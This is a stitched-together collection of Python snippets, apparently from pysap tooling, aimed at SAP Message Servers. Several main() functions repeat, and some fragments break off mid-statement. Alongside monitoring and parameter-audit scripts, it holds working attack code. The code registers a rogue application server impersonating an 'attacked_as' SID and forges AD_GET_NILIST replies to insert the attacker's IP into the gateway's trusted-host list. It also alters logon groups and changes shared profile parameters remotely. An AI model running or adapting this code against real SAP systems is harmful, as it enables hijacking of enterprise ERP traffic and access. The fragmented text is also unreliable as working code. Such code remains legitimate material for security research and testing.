def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) domain = ms_domain_values_inv[options.domain] # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) client_string = options.client # Send MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string) print("[*] Sending login packet") response = conn.sr(p)[SAPMS] print("[*] Login performed, server string: %s" % response.fromname) # Sends a message to another client p = SAPMS(flag=0x02, iflag=0x01, domain=domain, toname=options.target, fromname=client_string, opcode=1) p /= Raw(options.message) print("[*] Sending packet to: %s" % options.target) conn.send(p)
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) domain = ms_domain_values_inv[options.domain] # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) client_string = options.client # Send MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string) print("[*] Sending login packet:") response = conn.sr(p)[SAPMS] print("[*] Login OK, Server string: %s" % response.fromname) server_string = response.fromname # Send a Dump Info packet for each possible Dump for i in ms_dump_command_values.keys(): # Skip MS_DUMP_MSADM and MS_DUMP_COUNTER commands as the info # is included in other dump commands if i in [1, 12]: continue p = SAPMS(flag=0x02, iflag=0x01, domain=domain, toname=server_string, fromname=client_string, opcode=0x1e, dump_dest=0x02, dump_command=i) print("[*] Sending dump info", ms_dump_command_values[i]) response = conn.sr(p)[SAPMS] if response.opcode_error != 0: print("Error:", ms_opcode_error_values[response.opcode_error]) print(response.opcode_value)
def ms_build_set_logon(ptype, serv_info): if ptype == 'diag': logon_type = 'MS_LOGON_DIAG' port = serv_info['diag_port'] elif ptype == 'rfc': logon_type = 'MS_LOGON_RFC' port = serv_info['rfc_port'] address = serv_info['ip'] host = serv_info['fqdn'] p = SAPMS(fromname=my_name, toname=msg_server_name, flag='MS_REQUEST', iflag='MS_SEND_NAME', opcode='MS_SET_LOGON', logon=SAPMSLogon(type=logon_type, port=port, address=address, logonname_length=0, prot_length=0, host_length=len(host), host=host, misc_length=4, misc='LB=9')) / Raw(load="\xff\xff") return p
def ms_get_server_list(s, key): as_list_d = dict() p = SAPMS(fromname=my_name, toname=msg_server_name, key=key, flag='MS_REQUEST', opcode='MS_SERVER_LST', opcode_error='MSOP_OK', opcode_version=104, opcode_charset=3) r = s.sr(p) if not r.clients: logger.error("[!] Answer doesn't contain server list.") #s.close() return as_list_d # dict() handle_answer(s, r) for c in r.clients: as_list_d[c.client.strip()] = { "host": c.host.strip(), "ip": c.hostaddrv4, "port": c.servno, "type": c.sprintf('%SAPMSClient4.msgtype%'), "status": ms_client_status_values[c.status] } return as_list_d
def do_connect(self, args): """ Initiate the connection to the Message Server service. The connection is registered using the client_string runtime option. """ # Create the socket connection try: self.connection = SAPRoutedStreamSocket.get_nisocket(self.options.remote_host, self.options.remote_port, self.options.route_string, base_cls=SAPMS) except SocketError as e: self._error("Error connecting with the Message Server") self._error(str(e)) return self._print("Attached to %s / %d" % (self.options.remote_host, self.options.remote_port)) # Send MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, toname=self.runtimeoptions["client_string"], fromname=self.runtimeoptions["client_string"]) self._debug("Sending login packet") response = self.connection.sr(p)[SAPMS] if response.errorno == 0: self.runtimeoptions["server_string"] = response.fromname self._debug("Login performed, server string: %s" % response.fromname) self._print("pysap's Message Server monitor, connected to %s / %d" % (self.options.remote_host, self.options.remote_port)) self.connected = True else: if response.errorno in ms_errorno_values: self._error("Error performing login: %s" % ms_errorno_values[response.errorno]) else: self._error("Unknown error performing login: %d" % response.errorno)
def _build(self, flag, iflag, **args): return SAPMS( flag=flag, iflag=iflag, toname=self.runtimeoptions["server_string"], fromname=self.runtimeoptions["client_string"], domain=ms_domain_values_inv[self.runtimeoptions["domain"]], **args)
def ms_buld_prop_set_release(release='745', patchno='15'): return SAPMS(toname=msg_server_name, flag='MS_REQUEST', fromname=my_name, opcode='MS_SET_PROPERTY', opcode_charset=0, property=SAPMSProperty(id='Release information', release=release, patchno=int(patchno), platform=390))
def ms_build_del_logon_by_type(type): return SAPMS(toname=msg_server_name, fromname=my_name, flag='MS_REQUEST', iflag='MS_SEND_NAME', opcode='MS_DEL_LOGON', logon=SAPMSLogon(type=type, logonname_length=0, prot_length=0, host_length=0, misc_length=0, address6_length=65535))
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) domain = ms_domain_values_inv[options.domain] # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) client_string = options.client # Send MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string) print("[*] Sending login packet") response = conn.sr(p)[SAPMS] print("[*] Login performed, server string: %s" % response.fromname) print("[*] Listening to server messages") try: while (True): # Send MS_SERVER_LST packet response = conn.recv()[SAPMS] print("[*] Message received !") response.show() except SocketError: print("[*] Connection error") except KeyboardInterrupt: print("[*] Cancelled by the user")
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) # initiate the connection : print("[*] Initiate connection to message server %s:%d" % (options.remote_host, options.remote_port)) try: conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) except Exception as e: print(e) print( "Error during MS connection. Is internal ms port %d reachable ?" % options.remote_port) else: print("[*] Connected. I check parameters...") client_string = options.client # Send MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, toname=client_string, fromname=client_string) print("[*] Sending login packet:") response = conn.sr(p)[SAPMS] print("[*] Login OK, Server string: %s\n" % response.fromname) server_string = response.fromname try: with open(options.file_param) as list_param: for line in list_param.readlines(): line = line.strip() # Check for comments or empty lines if len(line) == 0 or line.startswith("#"): continue # Get parameters, check type and expected value # param2c = the SAP parameter to check # check_type = EQUAL, SUP, INF, REGEX, <none> # value2c = the expect value for 'ok' status (param2c, check_type, value2c) = line.split(':') status = '[!]' # create request adm = SAPMSAdmRecord(opcode=0x1, parameter=param2c) p = SAPMS(toname=server_string, fromname=client_string, version=4, flag=0x04, iflag=0x05, adm_records=[adm]) # send request respond = conn.sr(p)[SAPMS] value = respond.adm_records[0].parameter.replace( respond.adm_records[0].parameter.split('=')[0] + '=', '') # Verify if value match with expected value if value == '': value = 'NOT_EXIST' status = '[ ]' elif check_type == 'EQUAL': if value.upper() == str(value2c).upper(): status = '[+]' elif check_type == 'NOTEQUAL': if value.upper() != str(value2c).upper(): status = '[+]' elif check_type == 'REGEX': if re.match(value2c.upper(), value.upper()) and value2c != 'NOT_EXIST': status = '[+]' elif check_type == 'SUP': if float(value) >= float(value2c): status = '[+]' elif check_type == 'INF': if float(value) <= float(value2c): status = '[+]' else: status = '[ ]' # display result print("%s %s = %s" % (status, param2c, value)) except IOError: print("Error reading parameters file !") exit(0) except ValueError: print("Invalid parameters file format or access denied!") exit(0)
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) # Generate a random client string to differentiate our connection client_string = options.client # Send MS_LOGIN_2 packet print("[*] Sending login packet") p = SAPMS(flag=0x00, iflag=0x08, toname=client_string, fromname=client_string) response = conn.sr(p)[SAPMS] print("[*] Login performed, server string: %s" % response.fromname) server_string = response.fromname # Send MS_SERVER_CHG packet print("[*] Sending server change packet") p = SAPMS(flag=0x02, iflag=0x01, toname=server_string, fromname=client_string, opcode=0x01, opcode_version=4) response = conn.sr(p)[SAPMS] # Send MS_SERVER_LONG_LIST packet print("[*] Sending server long list packet") p = SAPMS(flag=0x01, iflag=0x01, toname=server_string, fromname=client_string, opcode=0x40, opcode_charset=0x00) conn.send(p) clients = [] def print_client(msg, client): if options.verbose: print("[*] %s %s (host=%s, service=%s, port=%d)" % (msg, client.client.strip(), client.host.strip(), client.service.strip(), client.servno)) # Send MS_SERVER_LST packet print("[*] Retrieving list of current clients") p = SAPMS(flag=0x02, iflag=0x01, toname=server_string, fromname=client_string, opcode=0x05, opcode_version=0x68) response = conn.sr(p)[SAPMS] for client in response.clients: if client.client != client_string: clients.append(("LIST", client)) print_client("Client", client) try: while (True): response = conn.recv()[SAPMS] response.show() if response.opcode == 0x02: # Added client client = response.clients[0] clients.append(("ADD", client)) print_client("Added client", client) elif response.opcode == 0x03: # Deleted client client = response.clients[0] clients.append(("DEL", client)) print_client("Deleted client", client) elif response.opcode == 0x04: # Modified client client = response.clients[0] clients.append(("MOD", client)) print_client("Modified client", client) except SocketError: print("[*] Connection error") except KeyboardInterrupt: print("[*] Cancelled by the user") finally: print("[*] Observed clients:") for action, client in clients: print("\t%s\tclient %s (host=%s, service=%s, port=%d)" % (action, client.client.strip(), client.host.strip(), client.service.strip(), client.servno))
"msport": 3901, "sid": "DEV", "instance": "00", "release": "745", "patchno": "15" } my_name = gen_ms_servername(fake_as["host"], attacked_as["sid"], attacked_as["instance"]) anon_name = '-' + ' ' * 39 msg_server_name = 'MSG_SERVER' # \x00MsgServer\x00FN_CHECK\x00FN_TP\x00tp$(' null_key = "\x00" * 8 p_logout = SAPMS(toname=anon_name, fromname=anon_name, flag=0, iflag='MS_LOGOUT') p_login_anon = SAPMS(toname=anon_name, fromname=anon_name, flag=0, iflag='MS_LOGIN_2') p_login_diag = SAPMS(toname=anon_name, fromname=my_name, msgtype='DIA+UPD+BTC+SPO+UP2+ICM', flag=0, iflag='MS_LOGIN_2', diag_port=fake_as['diag_port']) p_login_rfc = SAPMS(toname=anon_name,
"sid": "CIA", "instance": "00", "iface": None, "release": "745", "patchno": "15" } my_name = gen_ms_servername(fake_as["host"], attacked_as["sid"], attacked_as["instance"]) #attacked_name = gen_ms_servername(attacked_as["host"], attacked_as["sid"], attacked_as["instance"]) anon_name = '-' + ' ' * 39 msg_server_name = 'MSG_SERVER' # \x00MsgServer\x00FN_CHECK\x00FN_TP\x00tp$(' null_key = "\x00" * 8 p_logout = SAPMS(toname=anon_name, fromname=anon_name, flag=0, iflag='MS_LOGOUT') p_login_anon = SAPMS(toname=anon_name, fromname=anon_name, flag=0, iflag='MS_LOGIN_2') p_login_diag = SAPMS(toname=anon_name, fromname=my_name, msgtype='DIA+UPD+BTC+SPO+UP2+ICM', flag=0, iflag='MS_LOGIN_2', diag_port=fake_as['diag_port']) p_login_rfc = SAPMS(toname=anon_name,
attacked_as = { "ip": "172.16.100.50", "host": "sap-abap-01", "msport": 3901, "sid": "DEV", "instance": "00" } my_name = gen_ms_servername(fake_as["host"], attacked_as["sid"], attacked_as["instance"]) anon_name = '-' + ' ' * 39 null_key = "\x00" * 8 p_login_anon = SAPMS(toname=anon_name, fromname=anon_name, flag=0, iflag='MS_LOGIN_2', padd=0) p_logout = SAPMS(toname=anon_name, fromname=anon_name, flag=0, iflag='MS_LOGOUT', padd=0) p_adm_readall_i = SAPMS(fromname=my_name, toname=anon_name, flag='MS_ADMIN', iflag='MS_ADM_OPCODES', key=null_key, adm_recno=1,
def ms_adm_nilist(p, whos_asking): print "[+] " + yellow( "Generating AD_GET_NILIST_PORT answer for request with key", bold=True) + " '%s'" % p.key.encode('hex') fromname = str() toname = str() answer = 1 # extract info from key foo, key_t, key_u, key_respid = struct.unpack('!BBHL', p.key) fromname = my_name toname = p.fromname key = p.key flag = 'MS_REPLY' opcode_version = 5 adm_type = 'ADM_REPLY' rec = ' ' * 100 recno = 0 records = None r = SAPMS(toname=toname, fromname=fromname, key=key, domain='ABAP', flag=flag, iflag='MS_SEND_NAME', opcode='MS_DP_ADM', opcode_version=p.opcode_version, opcode_charset=p.opcode_charset, dp_version=p.dp_version, adm_recno=recno, adm_type=adm_type, adm_records=records) ############################### # 745 KERNEL and sometime 742 # ############################### # why "sometime" for 742? # they have both programs, old "RSMONGWY_SEND_NILIST" and new "RGWMON_SEND_NILIST" # they both use dp_version=13, but IP list format expected in the ADM layer is a # bit different between both programs. if p.dp_version == 13: r.adm_recno = 4 if 'RSMONGWY_SEND_NILIST' in whos_asking: r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record( fake_as["ip"]), serial_number=2, executed=answer) ] else: r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record(fake_as["ip"]), serial_number=2, executed=answer) ] r.dp_info1 = SAPDPInfo1( dp_req_len=452, dp_req_prio='MEDIUM', dp_type_from='BY_NAME', dp_fromname=my_name, dp_agent_type_from='DISP', dp_worker_from_num=p.dp_info1.dp_worker_to_num, dp_addr_from_t=p.dp_info1.dp_addr_from_t, dp_addr_from_u=p.dp_info1.dp_addr_from_u, dp_addr_from_m=0, dp_respid_from=p.dp_info1.dp_respid_from, dp_type_to='BY_NAME', dp_toname=p.fromname, dp_agent_type_to='WORKER', dp_worker_type_to='DIA', dp_worker_to_num=p.dp_info1.dp_worker_from_num, dp_addr_to_t=p.dp_info1.dp_addr_from_t, dp_addr_to_u=p.dp_info1.dp_addr_from_u, dp_addr_to_m=p.dp_info1.dp_addr_from_m, dp_respid_to=p.dp_info1.dp_respid_from, dp_req_handler='REQ_HANDLER_ADM_RESP', dp_blob_worker_from_num=p.dp_info1.dp_worker_from_num, dp_blob_addr_from_t=p.dp_info1.dp_addr_from_t, dp_blob_addr_from_u=p.dp_info1.dp_addr_from_u, dp_blob_respid_from=p.dp_info1.dp_blob_respid_from, dp_blob_dst=(' ' * 35).encode('UTF-16-BE')) ############## # 720 KERNEL # ############## # Here we use old IP list format # and a much simpler DP layer if p.dp_version == 11: r.adm_recno = 4 r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST', record=ms_adm_build_old_ip_record(fake_as["ip"]), serial_number=2, executed=answer) ] r.dp_info2 = SAPDPInfo2(dp_req_prio='MEDIUM', dp_blob_14=p.dp_info2.dp_blob_14, dp_name_to=p.fromname, dp_addr_from_t=255, dp_blob_09='\xff\xcc', dp_blob_10='\x01\x00', dp_addr_from_u=0, dp_addr_from_m=0, dp_addr_to_t=key_t, dp_addr_to_u=key_u, dp_addr_to_m=0, dp_respid_to=key_respid, dp_blob_19=1, dp_blob_21=105) ############## # 749 KERNEL # ############## # That's use on latest kernel like S4HANA servers if p.dp_version == 14: r.adm_recno = 4 r.adm_records = [ SAPMSAdmRecord(opcode='AD_SELFIDENT', record=rec, serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.1"), serial_number=0, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record("127.0.0.2"), serial_number=1, executed=answer), SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT', record=ms_adm_build_ip_record(fake_as["ip"]), serial_number=2, executed=answer) ] r.dp_info3 = SAPDPInfo3(dp_req_len=348, dp_req_prio='MEDIUM', dp_type_from='BY_NAME', dp_fromname=my_name, dp_agent_type_from='DISP', dp_worker_from_num=p.dp_info3.dp_worker_to_num, dp_addr_from_t=p.dp_info3.dp_addr_from_t, dp_addr_from_u=p.dp_info3.dp_addr_from_u, dp_addr_from_m=0, dp_respid_from=p.dp_info3.dp_respid_from, dp_type_to='BY_NAME', dp_toname=p.fromname, dp_agent_type_to='WORKER', dp_worker_type_to='DIA', dp_worker_to_num=p.dp_info3.dp_worker_from_num, dp_addr_to_t=p.dp_info3.dp_addr_from_t, dp_addr_to_u=p.dp_info3.dp_addr_from_u, dp_respid_to=p.dp_info3.dp_respid_from, dp_padd25=1, dp_req_handler='REQ_HANDLER_ADM_RESP', dp_padd29=p.dp_info3.dp_padd29, dp_padd30=p.dp_info3.dp_padd30, dp_padd31=p.dp_info3.dp_padd31, dp_padd32=p.dp_info3.dp_padd32) open("/tmp/dp.bin", "wb").write(str(SAPNI() / r)) return r
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) # Set release information prop = SAPMSProperty(id=7, release="720", patchno=70, supplvl=0, platform=0) p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x43, property=prop) print("[*] Setting release information") conn.send(p) # Perform the login enabling the DIA+BTC+ICM services p = SAPMS(flag=0x08, iflag=0x08, msgtype=0x89, toname="-", fromname=options.client) print("[*] Sending login packet") conn.sr(p)[SAPMS] print("[*] Login performed") # Changing the status to starting p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x05, toname="-", fromname=options.client) print("[*] Changing server's status to starting") conn.send(p) # Set IP address p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x06, opcode_version=0x01, change_ip_addressv4=options.logon_address) print("[*] Setting IP address") response = conn.sr(p)[SAPMS] print("[*] IP address set") response.show() # Set logon information l = SAPMSLogon(type=2, port=3200, address=options.logon_address, host=options.client, misc="LB=3") p = SAPMS(flag=0x01, iflag=0x01, msgtype=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x2b, logon=l) print("[*] Setting logon information") response = conn.sr(p)[SAPMS] print("[*] Logon information set") response.show() # Set the IP Address property prop = SAPMSProperty(client=options.client, id=0x03, address=options.logon_address) p = SAPMS(flag=0x02, iflag=0x01, toname="-", fromname=options.client, opcode=0x43, property=prop) print("[*] Setting IP address property") response = conn.sr(p)[SAPMS] print("[*] IP Address property set") response.show() # Changing the status to active p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x01, toname="-", fromname=options.client) print("[*] Changing server's status to active") conn.send(p) # Wait for connections try: while True: response = conn.recv()[SAPMS] response.show() except KeyboardInterrupt: print("[*] Cancelled by the user !") # Send MS_LOGOUT packet p = SAPMS(flag=0x00, iflag=0x04, toname="MSG_SERVER", fromname=options.client) print("[*] Sending logout packet") conn.send(p)
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) domain = ms_domain_values_inv[options.domain] # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) client_string = options.client # Build MS_LOGIN_2 packet p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string) # Send MS_LOGIN_2 packet print("[*] Sending login packet") response = conn.sr(p)[SAPMS] print("[*] Login performed, server string: %s" % response.fromname) server_string = response.fromname print("[*] Retrieving current value of parameter: %s" % options.param_name) # Send ADM AD_PROFILE request adm = SAPMSAdmRecord(opcode=0x1, parameter=options.param_name) p = SAPMS(toname=server_string, fromname=client_string, version=4, flag=0x04, iflag=0x05, domain=domain, adm_records=[adm]) print("[*] Sending packet") response = conn.sr(p)[SAPMS] if options.verbose: print("[*] Response:") response.show() param_old_value = response.adm_records[0].parameter print("[*] Parameter %s" % param_old_value) # If a parameter change was requested, send an ADM AD_SHARED_PARAMETER request if options.param_value: print("[*] Changing parameter value from: %s to: %s" % (param_old_value, options.param_value)) # Build the packet adm = SAPMSAdmRecord(opcode=0x2e, parameter="%s=%s" % (options.param_name, options.param_value)) p = SAPMS(toname=server_string, fromname=client_string, version=4, iflag=5, flag=4, domain=domain, adm_records=[adm]) # Send the packet print("[*] Sending packet") response = conn.sr(p)[SAPMS] if options.verbose: print("[*] Response:") response.show() if response.adm_records[0].errorno != 0: print("[*] Error requesting parameter change (error number %d)" % response.adm_records[0].errorno) else: print("[*] Parameter changed for the current session !")
def _build(self, flag, iflag, **args): return SAPMS(flag=flag, iflag=iflag, toname=self.runtimeoptions["server_string"], fromname=self.runtimeoptions["client_string"], **args)